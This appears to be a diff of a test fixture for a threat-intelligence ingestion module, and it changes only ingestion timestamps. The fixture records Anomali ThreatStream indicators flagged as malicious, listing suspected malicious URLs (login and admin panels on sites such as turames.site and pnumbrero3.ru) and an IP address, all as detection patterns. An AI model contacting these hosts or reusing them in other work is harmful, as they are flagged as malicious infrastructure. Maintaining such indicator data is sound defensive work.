@@ -6122,7 +6122,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023257Z", + "ingested": "2021-12-14T14:57:43.118209662Z", "original": "{\"created\":\"2020-01-26T02:55:34.637Z\",\"description\":\"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--ea0abbe1-3033-4549-8ba0-626f43807986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:55:34.637Z\",\"name\":\"mal_url: http://1926.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1926.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:34.637Z\"}", "category": "threat", "type": "indicator", @@ -6167,7 +6167,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023261300Z", + "ingested": "2021-12-14T14:57:43.118210111Z", "original": "{\"created\":\"2020-01-26T02:55:44.765Z\",\"description\":\"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-26T02:55:44.765Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:44.765Z\"}", "category": "threat", "type": "indicator", 
@@ -6212,7 +6212,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023266Z", + "ingested": "2021-12-14T14:57:43.118210493Z", "original": "{\"created\":\"2020-01-26T02:55:48.315Z\",\"description\":\"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:48.315Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.315Z\"}", "category": "threat", "type": "indicator", @@ -6263,7 +6263,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023269800Z", + "ingested": "2021-12-14T14:57:43.118211101Z", "original": "{\"created\":\"2020-01-26T02:55:48.35Z\",\"description\":\"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime\",\"id\":\"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:48.35Z\",\"name\":\"mal_url: http://185-24-53-218.com/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185-24-53-218.com/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.35Z\"}", "category": "threat", "type": "indicator", 
@@ -6314,7 +6314,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023273500Z", + "ingested": "2021-12-14T14:57:43.118211544Z", "original": "{\"created\":\"2020-01-26T02:55:58.711Z\",\"description\":\"TS ID: 55256890133; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--64655563-a4ad-4097-8cda-68c7bcc461f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:58.711Z\",\"name\":\"mal_url: http://1410.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1410.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:58.711Z\"}", "category": "threat", "type": "indicator", @@ -6366,7 +6366,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023278700Z", + "ingested": "2021-12-14T14:57:43.118211988Z", "original": "{\"created\":\"2020-01-26T02:56:23.739Z\",\"description\":\"TS ID: 55256890139; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--5ab7883f-17c2-4cc7-b854-33f8d4bc6b1e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-26T02:56:23.739Z\",\"name\":\"mal_url: http://nortonlilly.info/geli/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/geli/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.739Z\"}", "category": "threat", "type": "indicator", 
@@ -6417,7 +6417,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023286300Z", + "ingested": "2021-12-14T14:57:43.118212479Z", "original": "{\"created\":\"2020-01-26T02:56:23.79Z\",\"description\":\"TS ID: 55256890131; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--3417c349-153d-4002-92dd-1093893f3180\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-26T02:56:23.79Z\",\"name\":\"mal_url: http://2208.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2208.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.79Z\"}", "category": "threat", "type": "indicator", @@ -6462,7 +6462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023293400Z", + "ingested": "2021-12-14T14:57:43.118212979Z", "original": "{\"created\":\"2020-01-26T02:56:23.857Z\",\"description\":\"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-26T02:56:23.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:23.857Z\"}", "category": "threat", "type": "indicator", 
@@ -6513,7 +6513,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023300500Z", + "ingested": "2021-12-14T14:57:43.118213418Z", "original": "{\"created\":\"2020-01-26T02:56:29.981Z\",\"description\":\"TS ID: 55256890129; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--dba2c4a2-6ad5-455c-b14a-b437d32ef6a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:56:29.981Z\",\"name\":\"mal_url: http://1012.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1012.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:29.981Z\"}", "category": "threat", "type": "indicator", @@ -6565,7 +6565,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023307600Z", + "ingested": "2021-12-14T14:57:43.118213858Z", "original": "{\"created\":\"2020-01-26T02:56:32.609Z\",\"description\":\"TS ID: 55256890141; iType: mal_url; State: active; Org: H4Y Technologies LLC; Source: CyberCrime\",\"id\":\"indicator--5049f714-5462-4f8d-8b13-d95024d477ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-26T02:56:32.609Z\",\"name\":\"mal_url: http://coupondemo.dynamicinnovation.net/ren/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://coupondemo.dynamicinnovation.net/ren/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:32.609Z\"}", "category": "threat", "type": "indicator", 
@@ -6616,7 +6616,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023311Z", + "ingested": "2021-12-14T14:57:43.118214358Z", "original": "{\"created\":\"2020-01-26T02:56:33.504Z\",\"description\":\"TS ID: 55256890156; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--b476b4e0-387e-4cc6-8b93-437e05c9099c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:56:33.504Z\",\"name\":\"mal_url: http://51.38.140.2/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.38.140.2/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:33.504Z\"}", "category": "threat", "type": "indicator", @@ -6667,7 +6667,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023316100Z", + "ingested": "2021-12-14T14:57:43.118217177Z", "original": "{\"created\":\"2020-01-26T02:56:37.688Z\",\"description\":\"TS ID: 55256890163; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--27e994c3-5ee2-4f8b-9fc0-30ca4fc226ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-26T02:56:37.688Z\",\"name\":\"mal_url: http://baxarex228.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://baxarex228.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:37.688Z\"}", "category": "threat", "type": "indicator", 
@@ -6712,7 +6712,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023319900Z", + "ingested": "2021-12-14T14:57:43.118217808Z", "original": "{\"created\":\"2020-01-26T02:56:40.17Z\",\"description\":\"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-01-26T02:56:40.17Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:40.17Z\"}", "category": "threat", "type": "indicator", @@ -6757,7 +6757,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023323600Z", + "ingested": "2021-12-14T14:57:43.118218237Z", "original": "{\"created\":\"2020-01-26T02:56:49.862Z\",\"description\":\"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime\",\"id\":\"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:56:49.862Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.862Z\"}", "category": "threat", "type": "indicator", 
@@ -6802,7 +6802,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023329200Z", + "ingested": "2021-12-14T14:57:43.118218650Z", "original": "{\"created\":\"2020-01-26T02:56:49.9Z\",\"description\":\"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-01-26T02:56:49.9Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.9Z\"}", "category": "threat", "type": "indicator", @@ -6853,7 +6853,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023334600Z", + "ingested": "2021-12-14T14:57:43.118219038Z", "original": "{\"created\":\"2020-01-26T02:56:49.93Z\",\"description\":\"TS ID: 55256890130; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--8fb33d6a-4ed9-4c5a-9a8e-d7fc7e77b9d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-01-26T02:56:49.93Z\",\"name\":\"mal_url: http://0409.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://0409.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:56:49.93Z\"}", "category": "threat", "type": "indicator", 
@@ -6904,7 +6904,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023358400Z", + "ingested": "2021-12-14T14:57:43.118219424Z", "original": "{\"created\":\"2020-01-26T02:57:03.544Z\",\"description\":\"TS ID: 55256890157; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--96012440-e95d-46f0-9b70-3f495f4bab32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:57:03.544Z\",\"name\":\"mal_url: http://jor1.mirtakala.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.mirtakala.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:03.544Z\"}", "category": "threat", "type": "indicator", @@ -6955,7 +6955,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023362100Z", + "ingested": "2021-12-14T14:57:43.118219874Z", "original": "{\"created\":\"2020-01-26T02:57:10.525Z\",\"description\":\"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:10.525Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.525Z\"}", "category": "threat", "type": "indicator", 
@@ -7007,7 +7007,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023365700Z", + "ingested": "2021-12-14T14:57:43.118220294Z", "original": "{\"created\":\"2020-01-26T02:57:10.571Z\",\"description\":\"TS ID: 55256890135; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--275f3354-1d9c-4167-9f1a-abb06bb0f138\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-01-26T02:57:10.571Z\",\"name\":\"mal_url: http://pnumbrero3.ru/soft/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pnumbrero3.ru/soft/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:10.571Z\"}", "category": "threat", "type": "indicator", @@ -7058,7 +7058,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023369700Z", + "ingested": "2021-12-14T14:57:43.118220681Z", "original": "{\"created\":\"2020-01-26T02:57:14.057Z\",\"description\":\"TS ID: 55256890127; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--b449e457-5327-40a2-8bda-0167c219490c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:14.057Z\",\"name\":\"mal_url: http://10122.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10122.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:14.057Z\"}", "category": "threat", "type": "indicator", 
@@ -7109,7 +7109,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023374700Z", + "ingested": "2021-12-14T14:57:43.118221070Z", "original": "{\"created\":\"2020-01-26T02:57:26.003Z\",\"description\":\"TS ID: 55256890125; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--c8559f01-42c4-42f1-8464-e2e2e2af84d0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:57:26.003Z\",\"name\":\"mal_url: http://10123.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10123.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:26.003Z\"}", "category": "threat", "type": "indicator", @@ -7161,7 +7161,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023380100Z", + "ingested": "2021-12-14T14:57:43.118221478Z", "original": "{\"created\":\"2020-01-26T02:57:30.579Z\",\"description\":\"TS ID: 55256890134; iType: mal_url; State: active; Org: Reg.Ru Hosting; Source: CyberCrime\",\"id\":\"indicator--5898c646-c44b-4365-9d82-77bb1705b6de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:57:30.579Z\",\"name\":\"mal_url: http://u0929560.cp.regruhosting.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u0929560.cp.regruhosting.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:57:30.579Z\"}", "category": "threat", "type": "indicator", 
@@ -7212,7 +7212,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023386200Z", + "ingested": "2021-12-14T14:57:43.118221889Z", "original": "{\"created\":\"2020-01-27T02:54:45.711Z\",\"description\":\"TS ID: 55259870663; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--f5e450ee-d6c5-4a92-bfb4-4f8025b8c7e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:45.711Z\",\"name\":\"mal_url: http://turames3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:45.711Z\"}", "category": "threat", "type": "indicator", @@ -7263,7 +7263,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023389900Z", + "ingested": "2021-12-14T14:57:43.118222277Z", "original": "{\"created\":\"2020-01-27T02:54:59.928Z\",\"description\":\"TS ID: 55259870666; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--05b6bf66-2f31-4640-9ecd-9f8a3408d594\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:54:59.928Z\",\"name\":\"mal_url: http://turames.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turames.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:54:59.928Z\"}", "category": "threat", "type": "indicator", 
@@ -7314,7 +7314,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023395700Z", + "ingested": "2021-12-14T14:57:43.118222673Z", "original": "{\"created\":\"2020-01-27T02:55:12.572Z\",\"description\":\"TS ID: 55259870784; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff7fb9bd-e816-4a76-ae5c-72c22980c722\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:12.572Z\",\"name\":\"mal_url: http://bumaga5.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga5.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:12.572Z\"}", "category": "threat", "type": "indicator", @@ -7365,7 +7365,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023399700Z", + "ingested": "2021-12-14T14:57:43.118223129Z", "original": "{\"created\":\"2020-01-27T02:55:14.232Z\",\"description\":\"TS ID: 55259870699; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b0a1e3ec-d523-4e98-90d6-8ad3daa321d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.232Z\",\"name\":\"mal_url: http://mogute.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogute.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.232Z\"}", "category": "threat", "type": "indicator", 
@@ -7416,7 +7416,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023403900Z", + "ingested": "2021-12-14T14:57:43.118223781Z", "original": "{\"created\":\"2020-01-27T02:55:14.255Z\",\"description\":\"TS ID: 55259870694; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--92f0ba43-ec1f-4a37-b933-33ddd3da7e2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:14.255Z\",\"name\":\"mal_url: http://moguto.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguto.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:14.255Z\"}", "category": "threat", "type": "indicator", @@ -7467,7 +7467,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023407900Z", + "ingested": "2021-12-14T14:57:43.118224167Z", "original": "{\"created\":\"2020-01-27T02:55:30.174Z\",\"description\":\"TS ID: 55259870793; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ea0af135-c3c0-4e4e-96d9-bdf1ebb9699e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:30.174Z\",\"name\":\"mal_url: http://bumaga1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bumaga1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.174Z\"}", "category": "threat", "type": "indicator", 
@@ -7518,7 +7518,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023411900Z", + "ingested": "2021-12-14T14:57:43.118224743Z", "original": "{\"created\":\"2020-01-27T02:55:30.287Z\",\"description\":\"TS ID: 55259870765; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0de60f9b-7383-4c60-9caf-c578c3682487\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-27T02:55:30.287Z\",\"name\":\"mal_url: http://dufre1in.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1in.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.287Z\"}", "category": "threat", "type": "indicator", @@ -7569,7 +7569,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023417Z", + "ingested": "2021-12-14T14:57:43.118225230Z", "original": "{\"created\":\"2020-01-27T02:55:30.319Z\",\"description\":\"TS ID: 55259870697; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e8d57d94-82ce-4ce3-a983-d6928172d795\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:30.319Z\",\"name\":\"mal_url: http://moguti.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moguti.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.319Z\"}", "category": "threat", "type": "indicator", 
@@ -7621,7 +7621,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023420900Z", + "ingested": "2021-12-14T14:57:43.118225614Z", "original": "{\"created\":\"2020-01-27T02:55:30.343Z\",\"description\":\"TS ID: 55259870654; iType: mal_url; State: active; Org: Lir Ukraine LLC; Source: CyberCrime\",\"id\":\"indicator--4b567c10-4d32-40e4-87fd-b4654de5bf6b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-27T02:55:30.343Z\",\"name\":\"mal_url: http://stcubegames.netxi.in/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stcubegames.netxi.in/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:30.343Z\"}", "category": "threat", "type": "indicator", @@ -7672,7 +7672,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023424400Z", + "ingested": "2021-12-14T14:57:43.118226006Z", "original": "{\"created\":\"2020-01-27T02:55:34.56Z\",\"description\":\"TS ID: 55259870763; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ab82b31f-02c9-4d98-b49f-21ab18a48b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-27T02:55:34.56Z\",\"name\":\"mal_url: http://dufre3.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre3.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.56Z\"}", "category": "threat", "type": "indicator", 
@@ -7723,7 +7723,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023427900Z", + "ingested": "2021-12-14T14:57:43.118226463Z", "original": "{\"created\":\"2020-01-27T02:55:34.609Z\",\"description\":\"TS ID: 55259870730; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--47a1bc0c-5444-4c92-a0f8-a51655dd84e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:55:34.609Z\",\"name\":\"mal_url: http://merop12.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merop12.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:34.609Z\"}", "category": "threat", "type": "indicator", @@ -7774,7 +7774,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023431700Z", + "ingested": "2021-12-14T14:57:43.118226904Z", "original": "{\"created\":\"2020-01-27T02:55:36.798Z\",\"description\":\"TS ID: 55259870681; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--e3ee6b9d-f8cd-42fa-8f51-bb0d54446734\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:55:36.798Z\",\"name\":\"mal_url: http://ramesvet.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:55:36.798Z\"}", "category": "threat", "type": "indicator", 
